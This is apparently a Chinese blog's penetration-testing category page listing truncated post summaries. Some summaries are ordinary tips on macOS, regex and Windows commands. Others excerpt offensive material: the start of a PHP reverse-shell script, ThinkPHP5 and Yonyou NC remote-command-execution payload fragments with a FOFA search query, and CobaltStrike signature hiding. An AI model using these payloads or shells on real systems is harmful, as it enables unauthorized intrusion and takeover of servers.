随笔分类 -  渗透测试

1 2 3 4 下一页
mac 提示 zsh: operation not permitted
摘要:方法一:加执行权限 chmod 777 eeyes-darwin 方法二:加豁免权,使用xattr命令 xattr -d com.apple.quarantine eeyes-darwin 操作如下: ➜ Eeyes-darwin ./Eeyes-darwin zsh: operation not 阅读全文
posted @ 2024-12-25 21:30 rab3it 阅读(92) 评论(0) 推荐(0) 编辑
PHP反弹脚本 Linux/Windows两用
摘要:<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam 阅读全文
posted @ 2021-07-03 23:09 rab3it 阅读(284) 评论(0) 推荐(0) 编辑
常用正则表达式
摘要:很多不太懂正则的朋友,在遇到需要用正则校验数据时,往往是在网上去找很久,结果找来的还是不很符合要求。所以我最近把开发中常用的一些正则表达式整理了一下,在这里分享一下。给自己留个底,也给朋友们做个参考。 一、校验数字的表达式 1 数字:^[0-9]*$ 2 n位的数字:^\d{n}$ 3 至少n位的数 阅读全文
posted @ 2021-06-14 17:44 rab3it 阅读(79) 评论(0) 推荐(0) 编辑
WINDOWS下kill进程的命令
摘要:命令:Tasklist 功能:命令用来显示运行在本地或远程计算机上的所有进程,可以监控用户的操作。 命令格式: Tasklist [/S system [/U username [/P [password]]]] [/M [module] | /SVC | /V] [/FI filter] [/FO 阅读全文
posted @ 2021-06-11 09:08 rab3it 阅读(6811) 评论(0) 推荐(1) 编辑
thinkphp5 rce
摘要:thinkphp5 rce rce有两个大版本的分别: ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项 比如直接访问路由触发的。 5.1.x ?s=index/ 阅读全文
posted @ 2021-06-06 22:59 rab3it 阅读(397) 评论(0) 推荐(0) 编辑
渗透技巧——通过cmd上传文件的N种方法
摘要:<html> <head> <title>渗透技巧——通过cmd上传文件的N种方法 - 三好学生</title> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> </head> <body> <h1>原文地址:< 阅读全文
posted @ 2021-06-06 01:43 rab3it 阅读(1345) 评论(0) 推荐(0) 编辑
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
摘要:用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 FOFA: icon_hash="1085941792" 漏洞Url为 /servlet/~ic/bsh.servlet.BshServlet 执行 exec("cmd 阅读全文
posted @ 2021-06-03 09:53 rab3it 阅读(1863) 评论(0) 推荐(0) 编辑
数据库连接工具
摘要:多种数据库连接 MySQL、MariaDB、Postgre Server、Miscrosoft SQL Server、 HeidiSQL SQL Server 轻量: 天网中国SqlServer客户端 数据库查看 mdb、xls 辅臣数据库查看 阅读全文
posted @ 2021-05-30 12:02 rab3it 阅读(730) 评论(0) 推荐(0) 编辑
CobaltStrike特征隐藏的几种常见方法
摘要:CobaltStrike特征隐藏 1.修改默认端口 vi teamserver,我这里修改为3端口 阅读全文
posted @ 2021-05-20 22:26 rab3it 阅读(508) 评论(0) 推荐(0) 编辑
burp总是抓到mozilla等无用的数据包
摘要:方法一 针对火狐浏览器的解决方法 1.在firefox(火狐浏览器)地址栏中输入: about:config 2.然后出现搜索框,搜索以下内容,双击设置成false即可。 network.captive-portal-service.enabled network.connectivity-serv 阅读全文
posted @ 2021-05-19 18:19 rab3it 阅读(5253) 评论(0) 推荐(5) 编辑
mac系统创建.开头文件.htaccess
摘要:php 隐藏index.php的时候需要用到.htaccess文件,但是mac默认不让创建这种文件 在mac终端里面运行下面的显示 隐藏文件,就可以创建.文件了 显示隐藏文件 defaults write com.apple.finder AppleShowAllFiles -bool true 相 阅读全文
posted @ 2021-05-17 16:40 rab3it 阅读(138) 评论(0) 推荐(0) 编辑
判断当前环境是linux是 docker容器的方法
摘要:使用cgroup命令查看: cat /proc/1/cgroup 原理:容器是通过 cgroup 实现资源限制,判断容器是否在一个 cgroup 组中 如果是docker,显示: cpuset:/kubepods/burstable/podc.... cpuacct,cpu:/kubepods/bu 阅读全文
posted @ 2021-05-12 17:22 rab3it 阅读(2329) 评论(0) 推荐(1) 编辑
windows命令行查找文件
摘要:window查找文件: for /r c:\ %i in (frp*) do @echo %i #查找以frp开头的文件 for /r c:\ %i in (iisput*.txt) do @echo %i for /r d:\ %i in (banner-02*.jpg) do @echo %i 阅读全文
posted @ 2021-05-10 13:26 rab3it 阅读(3166) 评论(0) 推荐(0) 编辑
Java项目中修复Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)详细说明
摘要:最近阿里云发了漏洞短信,需要在以后的老项目中修复漏洞,修复了6套Java项目,不同项目修复方式有所不同,特写此篇博客,以作备忘,欢迎大家留言讨论。 1.漏洞说明 1.1阿里云漏洞短信内容 1.2阿里云漏洞详细报告 2.详细修复步骤 2.1下载漏洞验证工具 漏洞验证工具:https://github. 阅读全文
posted @ 2021-05-09 11:22 rab3it 阅读(1716) 评论(0) 推荐(0) 编辑

1 2 3 4 下一页
点击右上角即可分享
微信分享提示